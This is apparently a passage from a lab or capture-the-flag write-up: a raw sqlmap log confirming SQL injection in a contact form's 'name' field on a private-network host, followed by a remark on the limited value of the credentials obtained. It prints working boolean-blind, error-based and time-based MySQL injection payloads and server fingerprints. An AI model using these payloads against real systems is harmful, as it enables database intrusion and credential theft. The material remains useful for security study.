[15:16:57] [INFO] testing connection to the target URL
[15:16:58] [INFO] testing if the target URL content is stable
[15:16:58] [INFO] target URL content is stable
[15:16:58] [INFO] testing if POST parameter 'name' is dynamic
[15:16:58] [WARNING] POST parameter 'name' does not appear to be dynamic
[15:16:58] [INFO] heuristic (basic) test shows that POST parameter 'name' might be injectable (possible DBMS: 'MySQL')
[15:16:58] [INFO] heuristic (XSS) test shows that POST parameter 'name' might be vulnerable to cross-site scripting (XSS) attacks
[15:16:58] [INFO] testing for SQL injection on POST parameter 'name'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[15:17:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:17:06] [WARNING] reflective value(s) found and filtering out
[15:17:06] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:17:06] [INFO] testing 'Generic inline queries'
[15:17:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:17:06] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:17:07] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[15:17:07] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:17:07] [INFO] POST parameter 'name' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable (with --string="to")
[15:17:07] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[15:17:07] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[15:17:07] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[15:17:07] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[15:17:07] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[15:17:07] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[15:17:07] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[15:17:07] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[15:17:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:17:07] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:17:07] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:17:07] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:17:07] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[15:17:07] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[15:17:07] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:17:07] [INFO] POST parameter 'name' is 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[15:17:07] [INFO] testing 'MySQL inline queries'
[15:17:07] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[15:17:07] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[15:17:07] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[15:17:07] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[15:17:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[15:17:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[15:17:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:17:17] [INFO] POST parameter 'name' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[15:17:17] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:17:17] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[15:17:17] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:17:17] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[15:17:17] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[15:17:18] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[15:17:18] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[15:17:18] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[15:17:18] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[15:17:18] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[15:17:18] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[15:17:18] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
POST parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 396 HTTP(s) requests:
---
Parameter: name (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: name=1' RLIKE (SELECT (CASE WHEN (3453=3453) THEN 1 ELSE 0x28 END))-- fkrZ&email=&phone=&org=

Type: error-based
Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: name=1' AND ROW(9202,7421)>(SELECT COUNT(*),CONCAT(0x716b766271,(SELECT (ELT(9202=9202,1))),0x7171627a71,FLOOR(RAND(0)*2))x FROM (SELECT 5809 UNION SELECT 6254 UNION SELECT 2907 UNION SELECT 3295)a GROUP BY x)-- lorR&email=&phone=&org=

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: name=1' AND (SELECT 6598 FROM (SELECT(SLEEP(5)))WnCm)-- cXmx&email=&phone=&org=
---
[15:17:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 6 or 8 or 7 (Moonshine or Zod or Werewolf)
web application technology: Apache 2.2.6, PHP 5.2.4
back-end DBMS: MySQL >= 4.1
[15:17:23] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.139'

[*] ending @ 15:17:23 /2023-04-27/

Unfortunately the credentials obtained this way only work for logging into the blog page, not the admin panel or SSH, so they are of little value.
(screenshot: uTools_1682580664805.png)